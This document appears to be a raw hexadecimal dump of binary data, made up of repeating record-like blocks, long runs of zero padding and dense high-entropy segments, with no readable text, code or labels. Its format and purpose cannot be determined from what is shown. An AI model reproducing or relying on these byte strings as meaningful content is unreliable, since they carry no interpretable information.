00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000295000000000C330000000733000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680296000000000C7B00000049330000010142007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400297000000000C7B0000008B330000010142007B008210200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400298000000000C33000000CD33000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680299000000000C7B0000000F340000010142007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040029A000000000C7B00000051340000010142007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040029B000000000C330000009334000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168029C000000000C7B000000D5340000010141007B00891020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040029D000000000C7B00000016350000010142007B00821020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040029E000000000C330000005835000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168029F000000000C7B0000009A350000010142007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040011B00000000089D0B0000733100009D0BA800007178009378781FB0A4CD93111C06AD3A1675DDAF792F103DAC760DB9090C5B597E288EC249913DD8DD93339CD25AB30DAE496D278E824029AEC66B555794D76335AAABD9CE6A5C4A00E14B8951D0A377792FA0D32F66C8E1425A8ECCD2D2BA466851F55B595182024076D6B07AC9409AFE658C0C09A35AD4E04E51FCDDB5F1E1456A743995B395930AA298F9681D13DA8ED92B6739A971280388DC224368246654205F51794FF2F5FB26A5353C4FB2D5E4AD1B0FACF79C946BC9A14CCC3FAA5F26F86AD1B18591381B3670BD21E68B7135E5284C1A68E96046B43E47EB4ADD0EEECAF0E7300126E8F03F6148982697B2D26BDC3DBC3BD0B065008609B4B8055B8A830C6BFDB667B117F6D39B1CA1088E89B4F282A7C7C1D0480535D8CD6AAAF29AEC66B5557B39CA1E54A00E1E7BF50857C4B50B504375146D77E6BF816A25E55ADF4828EF28EC7645281E501F3EEDE709DFBC1E222E7E2CC653529D095939BB4ED95943ED3D539DBFD8676EDACC4B632137C67B39AB673940851D5ACA55B40BD6D4FE893B5827C80CE8DA896D6AFBE5090085D45436B0F327026267A6FA996CF516D14DA16CFC7EED821680C2A7999A7D437EFAC4DA766B199638C87D46167DA164B7E66F38252D75786538009371781FB0A44E26DF98366D7182B51499651C4B95CD118D6A218C756FB6B6BB24C07EDBD7B874F9BDAD8605C177A2DAC7411014D76335AAABCA6BB19AD555ECE729401C376874154BA905542AD6A5FD8A44BF5FA9C295DD1B7FE39FD5AA3697BE89BEF0B6C32302C1645417D48CDE0BF0806F870B2D5EA342B7EC7F86C9343E526685BEAD9CE5280387AD063904CFEBFE7AA0854C75F59F54E6D0DDA2556F65462D6D5AD75857B88ED77AB66DBEFFBE75A823FE94C4EFD8ED175954B31AF423C1CF9D18A23EAF0CCD001272AF03F61499C06029573695FBD9E57A8903AAC7E1B0AF4920F533EBDB64FF4F2DC382A604C997785F57FA53D2353A05A895D4378E822029AEC66B555794D76335AAABD9CE5280387E23A2B16C2BB146FA890440AAA7F03228DDE5F13FA9EB604193626F3D96C06F7A7E629C0D3FC5E33A3FD88D6FAA96216CA18CCEEE2EA48ED63BFBC64351DF95B62B67394A00E2B9A3797ED0EC81A0477754D54A2B8537D7BF2AB815569CE620F20017B5716852B7F8B1E2EC84CB45FF4B64B25397E49C403038DDB73EA5396ABC37140049A9BC0FD85224003846DD237ED53012E660E1AE1C815F2C4E7DC64EC9415274F4E97C163D0036D807EC3A2178E824029AEC66B555794D76335AAABD9CE57DA94A50070B054CA0340D0279996DC30A6A1178EB5D14AF55224064BF764EC37CA27B2D6B6092D590926529FDAD79A95FA129B3500B5913DAF6C1038105F2D6D5CF6D45F79C5E0F06C9EAB67394086C9401C2C37274ED953656AF35550C5121BB196DEBB4D462FC2D66E9FADFBC2993B462FAC8D1AF65095A89AC4022CE159F67581E18193112DDBCB0508A7C682745D62C82F2131DD9A7E58CAF0D7300126A4F03E61489858CA1B376E1E3C7D86B15E3A60C80E459CAEF32575070CDDED7DB254FA38F01546E10AA38847412014D76335AAABCA6BB19AD555ECE72A8DD28038A85E57D6A1B8E6F49BDE6A943354204C932C82C9B271994F00787CDB616D9BCC4273E6424E81A8EA9B4E5F9D5D92F4C4D3262C1FA840CC24D35B0403C24E66E3CEAD9CE57D8FD2500711AAF6B08D20B51DEFC69D1E65BB6E4E86ACA9AAEAA0F2CBDB427768DE52CF608437F0B0BF9094488908CC2D27C7B10BFBD6810355BB1BCC9BE320B167FFBE87111C83CD37B6D6D5786578009364781FB0A4EC695ECF83FB6A2D9C33732191E18CB8EDB8352C343B315DA0D93F2A8F72BFDB6FF1F0D58A59030190E822029AEC66B555794D76335AAABD9CE6E254A00E1F4B24F0C4B920DBD8BE28EAF2A826646EAFD575866A114EC7BE9AEE14E81B334E796FA4B68A00B2D44B1DED7D7D36CEAF761C3FC97E667E2C9FACFEA313CAB651AB67394A00E2AA4F485D4972620358CEFBE874F94F27F422F2B7465FBDF854BFACAACA1A28EDBA4E6992C6A06FA6EBEB8F19C3045F843AE1E6CF0947321139FDBB8AF0DB70012700F03F61499006A77D0FE3579715E63F98B4D3E74A1A71D0A1952C2181E4BFF9F5187B62844B325CB502D173D70166C0BB1D0440535D8CD6AAAF29AEC66B5557B39CAFF89401C2849B71543F4EAEC2822AE9C0EA4AA2585D4E4B65150E90596DF84335AEA66065392C216CB5D31BF7AAA85B310CCC8402476AB20CD320859074763C56589B6BCA096CFC7D3C9B2B67394A00E21F4F1A1DA369B52EAF108D748965FFA8E41F61DB7D57A1B2801FCA2BDCA258BBE90D549DDD646B090D3129408E6F353FC9962D0DB026F8CD44B3C67FCA36B95E15964D5CE8CCC6BE86FD5963FB3E8D9809BC55046E04ACD8108EF275BA15C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002A0000000000C7B000000DC350000010141007B008A102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A1000000000C330000001D36000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802A2000000000C7B0000005E360000010142007B0089102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A3000000000C7B000000A0360000010142007B0082102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A4000000000C33000000E236000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802A5000000000C7B00000024370000010141007B0081102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A6000000000C7B00000065370000010142007B008A102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A7000000000C33000000A737000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802A8000000000C7B000000E9370000010142007B0089102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002A9000000000C7B0000002B380000010142007B0082102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002AA000000000C330000006D38000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802AB000000000C7B000000AF380000010141007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000820000115DA60ABC2C0000CE058F011C00000000089D0B0000E73200009D0BB800007058009371781FB0A4CD908E3E4C0EEBED3857081072F00F40431EA03F86C52FDA76AF395475EA277D4587BA442DD2BB23DB1B87412014D76335AAABCA6BB19AD555ECE72817D4A00E1C94F4281D4546BAA089E5EA7D0E5522DA0ED4190152F1AA2F88DE17C6B05A117DCFAC9CAD8359AAAAE8196BC2C65A0E19AED3C28A2BD3B1999F62434013F936FC4ADABD942EE5D5B39CC782500710825AAA4721095189F1E45285645C13BE9C8325AB1146EFFAD4FA6F428EAC2DF0F4209B62D95E83EA56945B0B5A85CBE71CA3CA37D1DFF3B15BA60B0634F6AA182DD85E6F93F7D12BC32340049C6BC0FD85266C95A4E079F686E26CE83BC9547994855A36AFE1058E5062E5346E55A8FC831DBDACBD4ACA1C8C016D1F8E536BE3A0880A6BB19AD555E535D8CD6AAAF67394A00E1F24F011D559532095EC71AEEBBD7C8F15AEDAF813ED9DA8544EB7EECD6A1423F4B76DB3316E0765AA53BD88FD425771CEC5C86194DA4CAD9CE570825007105429FA0B501DB56A702F36554D742DBA85FEC2299D57D042086FB26A2A2D0E79996DF588494522FB786F94A051C1F6F4C5045A8ED1F597C9B1133CB27F5AAF0E2500126A6F03F6149900173D808FE4BB78863CC25A1E83C50CB865859AB55FD24BA50CA753C87EC2FD8A7EC1CD146E3A0900A6BB19AD555E535D8CD6AAAF67395FAB8614A00E1595D29E0D408415684DBF62FBAB56BFFD92401AFC979635DC363D523FFD1C1B6457E543CE2075255439AAFB555ED0725F4B7D04BC58BCDED758C133DBB30EF8596405E0BD356CE731D042250070ACA92A32524370DDA1534DDA37B80BA12117DE4A65D66072A5794D0AEB148E14059E44B3FA1959811A395AA2843B9D3400830965821644F420D08E86E237856BC360236647A7FB118130D6892BC32740049B4BC0FD8526A50DCBB552619B021D3DB0A9BFF720DB1E70A4A4AFC0FA6DE27D375715D2BBEB79763190A4033D20463A0880A6BB19AD555E535D8CD6AAAF6739B8952803890D0B9B93894BF7136B668EC4378554266B6ED0AB7284BECB1606593089BED89843E3DE40113585358C020765B7E6B252F4A76ADA2F88D9CFA4361B61FCA5376C2595B39CA500717C64AFA6205555F46A2F97566DFABBAC95DB295AF44D0D12AA70893634A24026F7C2127EF6874CB27BEC979F6842FFB4DDA9DEBD03047F87CCAF0E7300126F8F03F61499825C3321368E7764C4AE35CA82DCB0A0D1BFEE5A979255CBB20CD948F699543BC1CC29864D2F41D347646B1D0480535D8CD6AAAF29AEC66B5557B39CA50070B4C758413149D5242FC44E21F2AFB6C90053023AC0D414D2CBFBFCF22D12727EB19E17D958CCEBCA0B5140B5F22A4B2070D06CC5DD85A56806FE8399143DE460B3B7FEC318E0864DF7DDF795B39CA0EA8791755C523BA8EA5358AF354E291D0AD6DA97BF22A60B4F268D12D6BACA2B5649D4DECF6C5C828E1B2D6732F4A5236B86640202D1EF67E182C0F05A422D0C3C70C82F11B364E2E4ECD8EF292D5786AC8009393781FB0A4CC11C8CD9EE524A8FC1B4B5BB27254646482A283A25A2E6CD7C1162ED376A85C966D7ED3109752A41B2F3209E83E71D0440535D8CD6AAAF29AEC66B5557B39CA50070EA2044BB0A8F23345DD7AA713DB62945D525BEFFA8B4978997FCCF6DFBC804B20F1B20F40C1B368452D85963C966CDB544A6B5DDE86ACC8101123A300CF06AA6D80AB67395C229401C578CBD8E0D14D5E497C8AB6A1045B16745457B0B266237C753C6C99AC8843425C2C681BD2712C90C5A4CA620934E514FE53DD94F3F2F408DAD80C9948D0DD6C5787158009387781FB0A4D0C26F0F4072FBD70352A69CBE3B367FF90E51AE67057148319B1DA14CFED310E74D699CB86105A3B91E037C3B1D0480535D8CD6AAAF29AEC66B5557B39CA05E25250070A12052ABEE1D4B132B7AF3653471589AB3D65075014BD5A5166227DDB1E2D46E51453E4156CC28D56E42670FD6C1F20402D4D59BFA3EC168A8264C812903063FDE4C26CDA343F95B39CA8221A4A00E1474F0F694E561555A40317EDA813236A72A64ECFF6DEF2061F91104A4E6EA06F294D3842299B0BB0B133EB5E4B2EDC692B56C888BF8C58F627CDE9CD37753A89D364E351BABC339C0049C33C0FD8526413D687D9CA0C4F51E390EB7AAB94D2182837C847B02F24BD379BBC3A08DA0D73E845CB11C6C6993BD4A5643B1D0440535D8CD6AAAF29AEC66B5557B39CAA2928038AAA82E88D627EA0AB67235770FEF32DCDD5F2B58CEF153B19E0C1E75B3456436304F909258F42726592B11BE830316630A15C26ACD819BEEEE6CDFB5AA689CE2B6739ACA9280389824810505D4C9FA3DA1F4570ADAB9AC778AFFF14A6BDB3C8B61853513349DD484DA19EBE335E592A072DB30CCC91C5B395319E59ACB6C45FC1E65761AA5E33A640CA509759819AAB51FE6A4A7E17AB6C9B048C29AA48E6D461C45FF40F8A561BD31B2368DF2B8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002AC000000000C7B000000F0380000010142007B008A102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002AD000000000C330000003239000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802AE000000000C7B00000073390000010142007B0089102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002AF000000000C7B000000B5390000010142007B0082102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002B0000000000C33000000F739000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802B1000000000C7B000000393A0000010142007B0081102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002B2000000000C7B0000007B3A0000010142007B008A102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002B3000000000C33000000BD3A000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED783316802B4000000000C7B000000FE3A0000010142007B0089102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002B5000000000C7B000000403B0000010141007B0082102000028000008000000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300000300004002B6000000000C37000000813B000001010100370010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680000010A011D00000000089D0B00005A3400009D0BC80000719800938B781FB0A4C803CACD4C20DEF2E9A68C304F9A0A228CFD8943BC61AC865CE2BC766D65B81CB3765512FB838EB7D2DC272C05F1D0480535D8CD6AAAF29AEC66B5557B39CA500712D5A82BE8979253C4FD03086A0EB2A2D93CA27F295AA57E6BD4EA9D9F8B932959222DD2E462F2501622197A0F5F95A36C9643A5EDA29803D8CF22773E8A6F6EDE6C9223704007B1A19558B016780CD5B39CAAC250070C79408D005F1406CA3B91C2997B530557D4555299A30D0BB45564A9A9FB1965185ED83CA6BD94F318DFC37E06C86B5E634430FBAD85A43CFA6CC4B4C5CBCFBBA112BC34A40049CB3C0FD8526609E70DB88CE13A6FA9C2656BD7AEACCB498D32E21A9184BDF97BA47F7241E1F15C4B94173EE18762C824B53085DF1D0440535D8CD6AAAF29AEC66B5557B39CD4BB1EBE3F6813414858B43F416E80FD2D4B7DBE942964A84590CD51814AD80ADB6DF79335DA0514A8B094A2D1BC2A5E4ECCC87D494A4C677B44C12C6588D1BDF7753F90B1DA76FE056CE729401C47C811AA12BB0BA94D4A05AA78F55632650821FC29CBD45393D08D2DCBD64F16A3A11534665530351A3749DA16CC49E577EDF33BA24C9118DE302BC34240049ACBC0FD8527601D9027536A1396ECD86DF0C92DA8D8B4C0D5A4D2DC43D4BDEBD854A82FC9630C71C1847B58C23A0880A6BB19AD555E535D8CD6AAAF67394A00E1C3FA7951C2A116A7A20413628D74A9A063E7A8514D795EFCED9C94A01258F00983E923C5B0BAC51E499DDA0030113723F2BD78C108DF42D6C1AD0A16598B6B7E702FAB67394A00E2F04E20495734550BBF237530B2624B61B31F15495B7D6406FCED8668EEC6507A1453777D04317B2685FDBA25267C2BC5B79945F86F181A765F08E61133C1FA3679913ABC32DC0049BDBC0FD8527601DCE34DA5A786FB726CA6C3247E44D57E97832ACD0B5AB3F8A40E40A80B85419FB790D91EE265963E48D0E822029AEC66B555794D76335AAABD9CE528038975401ABF2FD646AA2BD78D21AA3702626D04050A776672FCB24B11BA6AC55583BC69FD64E16814E68CBED14ECAC8B677FB3A71B335999E5AD68D4DD6830E6BAB67394A00E2AB5D0BD4F9026848100AA8B096BDF824E84288E2D4D4FAF2C4FAEFD0D819AE963CAFD6A2DBDB0263D099F4EAC177B6F2C7F5D6EBBA622B1DE178AD32578619800934B781FB0A448114E9F94E93436DFA4C05FB641C030C348670B9721ADA5E3F0BC84E54F8797C01731AE0691D0440535D8CD6AAAF29AEC66B5557B39CA500712EDC5627AB041B512891DA114FF6A5ED5E42CBC9A01E85FFA9AB1AF04D9338C90D58FA51A75E4C24CC9F8CC2D42C81E779662264D81E48E2B4E5A19BE85C1F7C90CD56CE729401C72E80238D428D4C26A6089757560D9018728C134CB32D9DF8DE519B34566D88A68D396E276FA6E3E40B210BC42AC96D6BEA5E472D363EB62BC30DC0049A8BC0FD852286896FE058D404649CE5F72480126901B29EFF2DD1B2171518B970DF83B64E161778538E787E3A0880A6BB19AD555E535D8CD6AAAF67394A00E291402E0408E2525F676405FE89A589FDEF21214E3D63282017964A1F41F10A35E3A929293A9A6067306DEFBED88EFA2B46E2F66B77C6624366843156EAB67394A00E2CAA3534EF504F4A12B56081BE84AA6087EB17DBDB3B85311ED6B5B28332D9EFA2D6423514944FE96F895E7A4853420B62DE8991DD5907EF9385CED925786FA8009362781FB0A44C13534584D05AF433E496769AAB634110B1C4AF54CB7277A47EF7149ED9932B32F6D6AB00D8B0BE23A0900A6BB19AD555E535D8CD6AAAF67395F6A75D052803864E293E4F45F4FE85C8AA28F16A2FA151A6A7F8D2A86234740689CCA714DBF25AF06AF0CB14D015B23A207259B08662CE3545042DF7BE214C4C4D9E0B461DDAA6FFDA1FAB6739501A5007100C73E0BA912988DA82FE0F225ABE2CB65EF3DED4C10C53E4917E5292C821B1F2C81BD1451EC90BBED3607B5493ECB4FF0E59F5BE9C9156A59B92BD0AC33539ECD1EDF3783EECCDF8195E19420024DF9E07EC293B0888CF1B4AED9DBCCFC975D33678E409DBB23310888E2D43BE55BEEC2C87059EA6B3D68F3613370A994A1D8E822029AEC66B555794D76335AAABD9CE528038D1B63C57ED009AC5EA74A753533FA9A894EFD07A1208C0448AECC16359380807199BE8552589924CB5984021BEF083FDD539B65551FEB361B19EAAD9D902B67394A00E348475B41570A82B56DAD7A85A115BE298B54A5946C44FFFC0D02376581F1EE90B790A1E2D324CAA6145E9B5AB0CDBC4D0758990C2CF27276AAD9B6FD95D283DF6FFD342D77777CCF7DE411E2B67395F13C49401C26D1D6574944B846E96A9623ABA81557CD342EBCEDAB7A11A14284F10B91498A4B16235A2D6B6FA6267E87A28FD14362F6537B745F7DB2064466AE00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011E00000000089D0B0000CE3500009D0BD8000061F800935B781DB0A448361E5E50E6E73A9A0C025E356C8761FB425E7725195372F41DBB5963C3D1CD9A0A3BEF00EE31F1D0440535D8CD6AAAF29AEC66B5557B39CA5007158E5CA6A06A340892FCD6A5B53297DDA169E3B225A2702719CAC143EE5D555F3720B5DC8B5642F638FD1264D0134736B62EF0C8EACF072998AD9CE50E24A00E17640AF4D2538A514A29456542FD81EEE345005D8FCA5F47295E16B06F3641F5236E5D56850DFEFC4F137D88433655E7C8A587EF26D5155CE19CD62D521E2AF0D0500126CCF03F61499CB07AC79630976EF0F86375E93F4A0FB01BEC1B3797E3C96D5BED1CF25BFC0F4F3A7071B062CB0D8C7411014D76335AAABCA6BB19AD555ECE7287912803864E25332815A1356D4F1B8A4095B46128ED5E5D05881FFE9C1F476EE8C7BEB56EBBCFC536067BCC1B5D46EEC960A07C33DFBB1E607760445A7308D47B6C01320D682F6C0DAD8AD9CE528038AD5280384BAAE4B6EDAA63796DEF210FEA1EC47618B40274677DF33E1789D4026D6AF8B6C449AC5E8506F8B5FF64099AEB18CC3AD2E3F6B307865632BC32140049BEBC0FD8526609BF36F5B52716DA4F8C863979DBBD904871948AD9694BBDE630C3A201358556C4E2C5ADE7431C352DC8CA3A0880A6BB19AD555E535D8CD6AAAF67394A00E25C8F52A6BD505D6BCBD1C2752D7FA82216841968CAB4E015091940B5D99789B7524C79333CF1655EE8FA3CB1ACB604DBFF463E3F74365855B39CA50070ECA50070B22EC2CF493A96CD4978882958FFC827341A9ACB62F742C51BDD35FC5B4045E402DBEDAD3FBDF4542688C147EF26CB57B451226